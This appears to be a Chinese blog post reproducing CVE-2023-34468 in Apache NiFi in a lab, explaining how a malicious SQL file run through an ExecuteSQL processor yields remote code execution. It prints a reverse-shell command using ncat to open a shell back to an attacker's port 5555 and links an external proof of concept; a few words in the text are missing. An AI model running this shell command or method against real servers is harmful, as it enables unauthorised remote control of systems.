靶机要求
NiFi简介及其基本操作
今天来复现一下Apache NiFi的一个漏洞。首先,为了说明漏洞的原理和展示漏洞的复现过程,需要先介绍一下NiFi这款工具。
NiFi是一个易于使用、功能强大而且可靠的数据处理和分发系统。我的理解是,它就像一个中介机构,收集一方发来的数据,判断符合安全要求后发送给另一方(可以是为两个不同的IP地址的计算机)。而这里的CVE-2023-34468漏洞,就是由于NiFi在中间“判断数据安全性”上没有完善而导致恶意代码向靶机植入,从而出现远程代码运行的漏洞。
使用NiFi,最重要的是Processor,它可以看作运行不同代码的处理器,通过拖动左上角的插件进行添加。(例如我想从攻击机上上传一个含有恶意代码的SQL文件,那么需要使用ExecuteSQL的Processor,同时设置好上传的URL等)
POC
具体操作步骤参考https://github.com/mbadanoiu/CVE-2023-34468/blob/main/Apache%20NiFi%20-%20CVE-2023-34468.pdf下面具体分析步骤中的一些关键部分。
入侵靶机
这里攻击机对靶机的入侵是直接的。通过以下代码,靶机会在本机上运行目标地址上传的sql文件,此时,一旦上传的sql文件含有恶意代码,NiFi服务器将会作为靶机而遭到攻击。
ShellCode
这里核心的代码在变量command中,Shellcode通过运行
bash -c 'ncat -e /bin/bash 127.1 5555'
调用靶机的命令行向攻击机5555端口建立连接。建立连接后,即可以在攻击机上运行代码。
补充点
首先因为代码中会构造一个函数 ,故当文件重复上传时,会提示函数已存在的错误。
其次, 这个命令不一定在所有的电脑上都已经安装,如果没有预期结果,可以尝试将ShellCode中修改为 命令。
最后,根据作者的方法,最后也有可能会在5555端口监听不到连接,可能是Shellcode并没有实际运行。